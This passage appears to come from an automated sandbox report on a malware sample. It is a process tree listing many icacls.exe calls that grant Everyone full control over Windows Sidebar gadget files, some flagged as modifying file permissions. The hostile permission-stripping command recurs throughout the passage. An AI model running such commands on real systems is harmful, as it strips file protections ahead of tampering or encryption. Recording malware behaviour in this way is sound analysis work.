- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2208
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1040
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\34.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2696
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4608
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\38.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3720
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6040
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\4.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5856
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\40.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5032
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\41.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3588
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\42.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2076
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6024
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\43.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5016
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png /grant Everyone:F /T /C /Q
  2⤵
  PID:952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3928
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\47.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4056
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2932
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5356
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\7.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3540
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\8.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3912
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\9.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3956
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\activity16v.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6384
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5084
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5100
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5344
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3468
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7144
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_over.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3004
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3904
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over_BIDI.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4816
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5900
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7140
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-horizontal.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5996
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\divider-vertical.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4180
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_up_BIDI.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5864
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5412
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4412
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1464
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_hail.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6916
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4248
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4188
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5264
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-full_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3392
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4448
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-last-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2492
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2236
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4168
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-new_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5512
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5636
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3800
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3320
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4224
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6260
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waxing-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3264
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_rainy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5132
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png /grant Everyone:F /T /C /Q
  2⤵
  PID:7164
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4060
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6784
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5080
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_few-showers.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3292
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_windy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4256
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6908
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_hail.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1952
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_sun.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3408
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_windy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4752
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_thunderstorm.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5320
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_rainy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4044
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:2508
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6336
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\grayStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6764
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\greenStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6504
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\info.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6552
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\notConnectedStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5544
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5136
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2252
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4840
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5228
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_foggy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6148
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4792
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4064
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5308
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4564
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5584
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5328
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3728
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2160
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6080
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6288
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4452
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5188
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4208
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3216
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4480
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6096
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2212
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4360
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4892
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:3760
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_thunderstorm.png /grant Everyone:F /T /C /Q
  2⤵
  PID:836
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4376
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5880
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_snow.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5436
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_sun.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2364
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5504
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_cloudy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2064
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_few-showers.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4244
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6176
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_hail.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5592
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5380
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5684
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_thunderstorm.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6172
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)alertIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6160
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)grayStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4296
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)notConnectedStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6200
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)redStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6204
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:2308
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)greenStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5568
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:3752
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)greenStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4720
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:1732
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)redStateIcon.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4472
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2344
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\settings.html /grant Everyone:F /T /C /Q
  2⤵
  PID:4356
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\weather.html /grant Everyone:F /T /C /Q
  2⤵
  PID:2956
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\highDpiImageSwap.js /grant Everyone:F /T /C /Q
  2⤵
  PID:4672
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\library.js /grant Everyone:F /T /C /Q
  2⤵
  PID:4964
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\localizedStrings.js /grant Everyone:F /T /C /Q
  2⤵
  PID:5968
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\settings.js /grant Everyone:F /T /C /Q
  2⤵
  PID:4808
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js /grant Everyone:F /T /C /Q
  2⤵
  PID:3344
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\localizedSettings.css /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4340
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\settings.css /grant Everyone:F /T /C /Q
  2⤵
  PID:4640
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\css\weather.css /grant Everyone:F /T /C /Q
  2⤵
  PID:4776
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\icon.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6068
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6036
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\logo.png /grant Everyone:F /T /C /Q
  2⤵
  PID:5176
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\blank.png /grant Everyone:F /T /C /Q
  2⤵
  PID:4848
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_down.png /grant Everyone:F /T /C /Q
  2⤵
  PID:6232
- C:\Windows\system32\icacls.exe
  "icacls.exe" C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_hov.png /grant Everyone:F /T /C /Q
  2⤵
